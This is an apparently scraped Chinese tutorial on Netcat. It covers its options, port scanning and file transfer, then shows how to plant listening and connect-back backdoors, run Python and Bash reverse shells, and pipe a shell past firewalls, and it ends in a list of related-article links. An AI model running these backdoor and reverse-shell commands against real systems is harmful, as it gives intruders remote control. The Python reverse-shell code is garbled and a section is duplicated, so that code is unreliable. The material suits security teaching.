文章目录

  • Netcat
    • Netcat基本概述
    • 参数的介绍及使用
      • 内容重定向
    • 常用方法
    • netcat 建立后门
      • windows建立后门
        • 监听型后门
        • 连接型后门
      • Linux建立后门
        • 监听型后门
          • nc -l -p [port] -e /bin/bash
        • 连接型后门
    • 连接转发
      • 向内网中能够连接的机器中写入批处理文件(用于nc远程连接内网中不能通信的机器)
      • 客户端nc远程连接内网中能够连接的电脑
    • 反弹shell
      • 基于Python的shell反弹
      • 基于Bash的shell反弹
      • 内网穿透
        • 被防火墙拦截(不支持nc -e参数)
        • 被防火墙拦截(不支持nc -e参数)

Netcat

Netcat基本概述

netcat又叫做瑞士军刀,是黑客和系统管理员常用的网络工具,初开发的目的是文件传输,后来发展除了很多强大的功能

**注意:**一般不建议在生产环境安装nc,因为nc除了可以批量主机服务扫描外,还支持端口代理、文件传输,容易造成安全隐患

参数的介绍及使用

-4 使用IPv4版本的IP地址

-6 使用IPv6版本的IP地址

-b 允许UDP广播

-c string(sudo ifconfig) 远程连接后要执行的shell code 命令。字符串被传递给/bin/sh

-C 发送CRLF(回车换行)作为行尾

d 脱离命令窗口,在后台运行,常用于后门建立过程

-e filename(.exe/…) 远程连接后返回的程序,常用于后门建立过程

-g gateway 设置网关,常用于突破内网限制

-G num 路由跳数(例如4,8,12…)

-h 查看命令参数

-i secs 设置每发送一个行数据的时间间隔

-l [localhost address] 设置netcat处于监听状态等待链接

-L [localhost address]设置netcat处于监听状态等待链接,当客户端断开,服务端依旧回到等待状态

man ~ 获得详细信息

-n 不对目标机器进行DNS解析

使用过程中使用-n参数只传入IP,减少了Netcat把域名解析成IP的过程,这样可以节省时间提高效率

-o file 设置传输十六进制的数据

-p [localhost port] 端口

-q seconds 在标准输入流上读取文件(判断EOF),等待指定的秒数,然后退出。如果秒数为负数,永远等待

-r 设置netcat随机化的端口号

-s [addr] 设置telnet源地址(用于源地址欺骗)

-t 回复telnet的请求数据包

-T type 设置TOS标志(类型可以是“最小化延迟”,“最大化吞吐量”、“最大化可靠性”或“最小化成本”)

-u 设置netcat使用UDP模式

-v 表示对错误进行详细输出

可以用来获取banner信息
>echo " " | nc -v -n -w1 [ip:port]
快速端口扫描
>nc -v -n -z -m1 [ip:port]

-w secs 最大等待连接时间(若time时间内无法连接到服务器端,则断掉连接,防止"假死"状态)

-z zero I/O模式,专用于端口扫描。对于目标IP发送的数据表中不包含任何payload,这样可以加快扫描速度(0 标准输入)

-z参数默认使用的是TCP类型的数据扫描,如果需要进行UDP扫描,则需要使用-u参数

内容重定向

nc [localhost port]< file 上传文件

nc [localhost port] > file 下载文件

常用方法

常用 Server Client
端口扫描 nc -z -n -v [IP Address] [Port]
获取banner信息 nc -n -v [IP Address] [Port]
远程连接 nc -l [port] nc [IP Address] [Port]
文件传输(下载) nc -l [port] < file nc [IP Address] [Port] > file
文件传输(上传) nc [IP Address] [Port] > file nc -l [port] < file
多文件传输(下载) tar -cvf filename | nc -l [port] nc [IP Address] [Port] | tar -xvf
指定使用的压缩方法(以bzip2为例) tar -cvf filename | bzip2 -z | nc -l [port] nc [IP Address] [Port] | bzip2 -d | tar -xvf
加密发送数据 nc localhost port|mcrypt -flush -bare -F -q -d -m ecb > file mcrypt -flush -bare -F -q-m ecb < file | nc [IP Address] [Port]
视频流文件(下载) cat video.avi|nc -l [port] nc [IP Address] [port]|mplayer -vo x11 -cache 3000
克隆一个设备配置 dd if=/dev/sda|nc -l port nc -n [IP Address] [port]|dd of=/dev/sda

netcat 建立后门

windows建立后门

监听型后门

能够连接值服务端,并从服务端返回客户端一个shell

nc -l -p [port] -e cmd.exe

连接型后门

能够连接值服务端,给服务端提供一个shell

nc [IP Address port] -e cmd.exe

Linux建立后门

监听型后门

nc -l -p [port] -e /bin/bash

连接型后门

nc [IP Address port] -e /bin/bash

连接转发

当有客户端连接该服务端时,连接的客户端和通过服务端连接到 target port上 实现了连接转发功能。(端口转发)

向内网中能够连接的机器中写入批处理文件(用于nc远程连接内网中不能通信的机器)

echo nc [IP Address:port] > xx.bat

客户端nc远程连接内网中能够连接的电脑

nc -l -p [localport] -e xx.bat

有一个特殊的文件/dev/tcp,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。1. 打开/dev/tcp以读写方式打开/dev/tcp,并指定服务器名为: www.csdn.net,端口号为:80,指定描述符为8exec 8<>/dev/tcp/www.csdn.net/80要注意的是:/dev/tcp本身是不存在的。
2. 向文件中写入数据向文件中随便写一些数据: echo -e "GET">8&
3. 读文件读取返回的信息:cat<&8

反弹shell

基于Python的shell反弹

!/usr/bin/python
import os,subprocess,sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect("IP","port")
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2
p=subprocess.call(["/bin/sh","-i"])

基于Bash的shell反弹

##### 反弹shell命令
>bash -i >& /dev/tcp/ip/port 0>&1
##### 交互模式运行bash/shell
>bash -i
##### \>&重定向度
##### 0 标准输入 1 标准输出 2 错误输入输出
##### PC端就收Netcat指令
>nc -lvp port

内网穿透

被防火墙拦截(不支持nc -e参数)

nc ip port | /bin/bash | nc ip port

通过管道反弹shell命令

此时需要提供两个端口,一个用于连接,一个用于监听

内网穿透

被防火墙拦截(不支持nc -e参数)

nc ip port | /bin/bash | nc ip port

通过管道反弹shell命令

此时需要提供两个端口,一个用于连接,一个用于监听

[网络安全]Netcat的基本使用相关推荐

  1. 审核网络安全的十大必备工具

    如果想更好的认清网络的现状,请看本文主要讲述了可以帮助我们审核网络安全的十个工具. 一.Nessus:这是一款UNIX平台的漏洞评估工具,可以说它是最好的.免费的网络漏洞扫描程序.其更新速度很快,有超 ...

  2. Nmap/Netcat/Hping3工具对比

    在网络安全领域,Nmap.Netcat.Hping3都是安全工程师必备的工具.Nmap主要作为端口扫描器,侦查目标机的端口及服务状态:而Netcat则整合了网络中各种常用功能(如后门.文件传输.端口扫 ...

  3. netstat/nmap/netcat用法

    这三款工具是网络安全利器,做一个简单摘要,以备参考. netcat--网安瑞士军刀 netcat可以用于监控/扫描网络端口,它应用最多的情况是后门程序. 一般分两个步骤: 步骤一: 我们在被攻击的机器 ...

  4. 【网络安全】Penelope:一款功能强大的Shell处理工具

    关于Penelope Penelope是一款功能强大的Shell处理工具,该工具的主要功能是在利用RCE漏洞的过程中,替代netcat并作为Shell捕捉器来使用.该工具可以在Linux和macOS上 ...

  5. [网络安全提高篇] 一一五.Powershell恶意代码检测 (3)Token关键词自动提取

    "网络安全提高班"新的100篇文章即将开启,包括Web渗透.内网渗透.靶场搭建.CVE复现.攻击溯源.实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史.换专业确实挺难 ...

  6. Lockdoor Framework:一套自带大量网络安全资源的渗透测试框架

    博客&文章 Reddit:[传送门] Medium.com:[传送门] Xploit Lab:[传送门] Station X:[传送门] Kelvin Security :[传送门] All ...

  7. 一些网络安全的工具软件的介绍

    因为是在 nmap-hackers 邮件列表中做出的评选,因此没有把 nmap 安全扫描仪( http://www.insecure.org/nmap/ )评选在内.         这次评选出来的 ...

  8. 网络安全:网络攻击原理与方法.

    网络安全:网络攻击原理与方法. 网络攻击:是损害网络系统安全属性的危害行为.危害行为导致网络系统的机密性.完整性.可控性.真实性.抗抵赖性等受到不同程度的破坏. 目录: 常见的危害行为有四个基本类型: ...

  9. 网络安全红队常用的攻击方法及路径

    一.信息收集 收集的内容包括目标系统的组织架构.IT资产.敏感信息泄露.供应商信息等各个方面,通过对收集的信息进行梳理,定位到安全薄弱点,从而实施下一步的攻击行为. 域名收集 1.备案查询 天眼查 爱 ...

最新文章

  1. Ecplise 恢复刚刚删除的文件
  2. AI攻击AI,升级的网络安全战
  3. IntelliJ IDEA快捷键与使用小技巧
  4. 【Socket网络编程】14. perror()、errno 的使用
  5. html2canvas导出地图,Leaflet OpenStreetMap使用html2canvas使用地图标记导出图像
  6. mysql数据库多少张表会影响性能_mysql数据库多少张表会影响性能
  7. 多线程“基础篇”11之 生产消费者问题
  8. 使用代理,调用json-server的服务接口
  9. 040_Auto.js
  10. WPF DataGrid显示图片的一种方法
  11. java定时器quartz
  12. 产品技术人必备干货:产品开发流程(完整版)
  13. 计算机c盘满了怎么搬家,c盘满了怎么办 c盘怎么搬家【搬家步骤】
  14. 使用ps删除多余的内容
  15. 消息队列在linux下实现进程间的通信;消息盒子在单片机中的代码实现
  16. 中国(广西)壮语春节联欢晚会将举办
  17. 最大似然估计方法介绍
  18. Vuex前端saas人力资源中台管理项目第四天 员工管理模块
  19. 思考互联网发展三阶段
  20. C波段、KU波段与雨衰现象

热门文章

  1. YAMAHA机器人(EtherNet/IP)与西门子S71500系列PLC(PROFINET)通讯
  2. 【分治递归】南蛮图腾
  3. 用ChatGPT 辅导复杂数学作业
  4. 计算机专业毕业设计题目选题|论文经验分享
  5. 通用计算机考试系统,通用考试评卷系统
  6. 告诉你一个去除PDF文件水印简单快速的方法
  7. 基于ESP32的隔空开灯
  8. 充电计划 -- http协议
  9. 用3dmax做折扇的思路方法与步骤
  10. 基于S7-300 PLC组态王组态的锅炉燃烧控制系统的设计